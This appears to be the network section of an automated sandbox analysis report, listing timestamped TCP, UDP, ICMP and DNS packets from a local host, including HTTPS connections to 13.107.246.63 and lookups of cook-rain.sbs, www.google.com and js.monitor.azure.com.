                                                                                                                                                                                                                      Nov 20, 2024 17:43:21.972707987 CET50096443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:21.972729921 CET4435009613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:21.972851992 CET50096443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:21.972867966 CET4435009613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:21.972875118 CET50096443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:21.973022938 CET4435009613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:21.973059893 CET4435009613.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:21.973093987 CET50096443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:21.974914074 CET50102443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:21.974930048 CET4435010213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:21.974986076 CET50102443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:21.975090981 CET50102443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:21.975106955 CET4435010213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:22.075725079 CET4435009813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:22.076124907 CET50098443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:22.076137066 CET4435009813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:22.076565027 CET50098443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:22.076570034 CET4435009813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:22.515583992 CET4435009813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:22.515613079 CET4435009813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:22.515799999 CET50098443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:22.515837908 CET4435009813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:22.516164064 CET50098443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:22.516185999 CET4435009813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:22.516195059 CET50098443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:22.516495943 CET4435009813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:22.516891956 CET4435009813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:22.517117977 CET50098443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:22.519561052 CET50103443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:22.519610882 CET4435010313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:22.519706011 CET50103443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:22.519840956 CET50103443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:22.519854069 CET4435010313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:22.622199059 CET4435009913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:22.622766972 CET50099443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:22.622791052 CET4435009913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:22.623280048 CET50099443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:22.623285055 CET4435009913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.086864948 CET4435009913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.086954117 CET4435009913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.087230921 CET50099443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.087280989 CET50099443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.087281942 CET50099443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.087304115 CET4435009913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.087326050 CET4435009913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.090471983 CET50104443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.090507984 CET4435010413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.090607882 CET50104443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.090816021 CET50104443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.090831995 CET4435010413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.391171932 CET4435010013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.391921997 CET50100443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.391947031 CET4435010013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.392664909 CET50100443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.392669916 CET4435010013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.802764893 CET4435010113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.803401947 CET50101443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.803428888 CET4435010113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.804071903 CET50101443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.804083109 CET4435010113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.828669071 CET4435010013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.828741074 CET4435010013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.830482960 CET50100443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.830581903 CET50100443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.830593109 CET4435010013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.830601931 CET50100443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.830605984 CET4435010013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.834261894 CET50105443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.834350109 CET4435010513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.834439039 CET50105443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.834589005 CET50105443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.834625006 CET4435010513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.873631001 CET4435010213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.874608994 CET50102443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.874624968 CET4435010213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.875216007 CET50102443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:23.875220060 CET4435010213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.249876976 CET4435010113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.250056028 CET4435010113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.250205040 CET50101443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.250241041 CET50101443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.250251055 CET4435010113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.250261068 CET50101443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.250266075 CET4435010113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.254385948 CET50107443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.254419088 CET4435010713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.254491091 CET50107443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.254842997 CET50107443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.254869938 CET4435010713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.262892962 CET4435010313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.263361931 CET50103443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.263372898 CET4435010313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.264020920 CET50103443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.264025927 CET4435010313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.318528891 CET4435010213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.321607113 CET4435010213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.321675062 CET50102443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.321717978 CET50102443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.321724892 CET4435010213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.321742058 CET50102443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.321748018 CET4435010213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.324491024 CET50108443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.324527025 CET4435010813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.324603081 CET50108443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.324827909 CET50108443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.324845076 CET4435010813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.849648952 CET4435010313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.849709034 CET4435010313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.849837065 CET50103443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.849858999 CET4435010313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.850127935 CET50103443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.850225925 CET50103443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.850233078 CET4435010313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.850253105 CET50103443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.850681067 CET4435010313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.850760937 CET4435010313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.850883007 CET50103443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.854223013 CET50109443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.854254961 CET4435010913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.854342937 CET50109443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.854576111 CET50109443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.854587078 CET4435010913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.937762976 CET4435010413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.938555002 CET50104443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.938582897 CET4435010413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.939202070 CET50104443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.939208031 CET4435010413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:25.401082993 CET4435010413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:25.401107073 CET4435010413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:25.401163101 CET4435010413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:25.401206970 CET50104443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:25.401417017 CET50104443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:25.401530027 CET50104443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:25.401554108 CET4435010413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:25.401572943 CET50104443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:25.401580095 CET4435010413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:25.405518055 CET50110443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:25.405555010 CET4435011013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:25.405635118 CET50110443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:25.406080961 CET50110443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:25.406096935 CET4435011013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:25.615432024 CET4435010513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:25.617892027 CET50105443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:25.617933035 CET4435010513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:25.618655920 CET50105443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:25.618669033 CET4435010513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.118881941 CET4435010513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.118906021 CET4435010513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.118921995 CET4435010513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.118983984 CET50105443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.119035006 CET4435010513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.119070053 CET50105443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.119110107 CET50105443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.193964958 CET4435010713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.195250034 CET50107443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.195250034 CET50107443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.195291996 CET4435010713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.195306063 CET4435010713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.259032965 CET4435010813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.259701967 CET50108443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.259722948 CET4435010813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.260715008 CET50108443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.260720968 CET4435010813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.278194904 CET4435010513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.278250933 CET4435010513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.278328896 CET50105443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.278328896 CET50105443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.278430939 CET50105443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.278476954 CET4435010513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.278503895 CET50105443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.278521061 CET4435010513.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.281994104 CET50111443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.282036066 CET4435011113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.282227993 CET50111443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.282342911 CET50111443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.282360077 CET4435011113.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.575459957 CET4435010913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.576153994 CET50109443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.576178074 CET4435010913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.576597929 CET50109443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.576605082 CET4435010913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.641308069 CET4435010713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.641381025 CET4435010713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.641468048 CET50107443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.641499996 CET4435010713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.643383980 CET50107443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.643393993 CET4435010713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.643424988 CET50107443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.643831015 CET4435010713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.643918037 CET4435010713.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.646800041 CET50112443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.646806955 CET50107443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.646840096 CET4435011213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.646915913 CET50112443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.647238970 CET50112443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.647253990 CET4435011213.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.769117117 CET4435010813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.769145966 CET4435010813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.769166946 CET4435010813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.769237041 CET50108443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.769299030 CET4435010813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.769339085 CET50108443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.769361973 CET50108443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.956800938 CET4435010813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.956865072 CET4435010813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.956892014 CET50108443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.956902981 CET4435010813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.956939936 CET50108443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.956959963 CET50108443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.957139015 CET50108443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.957158089 CET4435010813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.957169056 CET50108443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.957174063 CET4435010813.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.960469961 CET50113443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.960493088 CET4435011313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.960628033 CET50113443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.960786104 CET50113443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:26.960798979 CET4435011313.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:27.026303053 CET4435010913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:27.026385069 CET4435010913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:27.026495934 CET50109443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:27.026516914 CET4435010913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:27.027323008 CET50109443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:27.027524948 CET50109443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:27.027524948 CET50109443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:27.027537107 CET4435010913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:27.027992964 CET4435010913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:27.028083086 CET4435010913.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:27.030555964 CET50114443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:27.030555964 CET50109443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:27.030592918 CET4435011413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:27.031332970 CET50114443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:27.031552076 CET50114443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:27.031568050 CET4435011413.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:27.335041046 CET4435011013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:27.335650921 CET50110443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:27.335681915 CET4435011013.107.246.63192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:27.336154938 CET50110443192.168.2.713.107.246.63
                                                                                                                                                                                                                      Nov 20, 2024 17:43:27.336162090 CET4435011013.107.246.63192.168.2.7
                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                      Nov 20, 2024 17:41:20.441626072 CET6431853192.168.2.71.1.1.1
                                                                                                                                                                                                                      Nov 20, 2024 17:41:20.672645092 CET53643181.1.1.1192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:21.862118959 CET123123192.168.2.740.81.94.65
                                                                                                                                                                                                                      Nov 20, 2024 17:41:22.468419075 CET12312340.81.94.65192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.792763948 CET53654981.1.1.1192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:54.853830099 CET53639921.1.1.1192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:57.514178038 CET53525381.1.1.1192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:59.022517920 CET5400253192.168.2.71.1.1.1
                                                                                                                                                                                                                      Nov 20, 2024 17:41:59.022968054 CET5013653192.168.2.71.1.1.1
                                                                                                                                                                                                                      Nov 20, 2024 17:41:59.166316986 CET53540021.1.1.1192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:41:59.167072058 CET53501361.1.1.1192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:01.755567074 CET6001253192.168.2.71.1.1.1
                                                                                                                                                                                                                      Nov 20, 2024 17:42:01.755851984 CET5277053192.168.2.71.1.1.1
                                                                                                                                                                                                                      Nov 20, 2024 17:42:05.319427967 CET6266553192.168.2.71.1.1.1
                                                                                                                                                                                                                      Nov 20, 2024 17:42:05.319566011 CET5557353192.168.2.71.1.1.1
                                                                                                                                                                                                                      Nov 20, 2024 17:42:12.515780926 CET53582101.1.1.1192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:14.973418951 CET6476353192.168.2.71.1.1.1
                                                                                                                                                                                                                      Nov 20, 2024 17:42:14.973629951 CET6401053192.168.2.71.1.1.1
                                                                                                                                                                                                                      Nov 20, 2024 17:42:15.110337973 CET53549381.1.1.1192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:15.775568962 CET138138192.168.2.7192.168.2.255
                                                                                                                                                                                                                      Nov 20, 2024 17:42:34.283741951 CET53603531.1.1.1192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:54.485560894 CET53594071.1.1.1192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:42:57.390418053 CET53525801.1.1.1192.168.2.7
                                                                                                                                                                                                                      Nov 20, 2024 17:43:24.337568998 CET53637721.1.1.1192.168.2.7
                                                                                                                                                                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                                                                                                                                                                      Nov 20, 2024 17:41:57.060786963 CET192.168.2.71.1.1.1c2e6(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                      Nov 20, 2024 17:42:21.465734005 CET192.168.2.71.1.1.1c267(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                      Nov 20, 2024 17:42:28.520123959 CET192.168.2.71.1.1.1c267(Port unreachable)Destination Unreachable
                                                                                                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                      Nov 20, 2024 17:41:20.441626072 CET192.168.2.71.1.1.10x12b4Standard query (0)cook-rain.sbsA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:41:59.022517920 CET192.168.2.71.1.1.10xb622Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:41:59.022968054 CET192.168.2.71.1.1.10x3339Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:01.755567074 CET192.168.2.71.1.1.10x92beStandard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:01.755851984 CET192.168.2.71.1.1.10x30eaStandard query (0)js.monitor.azure.com65IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:05.319427967 CET192.168.2.71.1.1.10x2b6Standard query (0)js.monitor.azure.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                      Nov 20, 2024 17:42:05.319566011 CET192.168.2.71.1.1.10xc028Standard query (0)js.monitor.azure.com65IN (0x0001)false
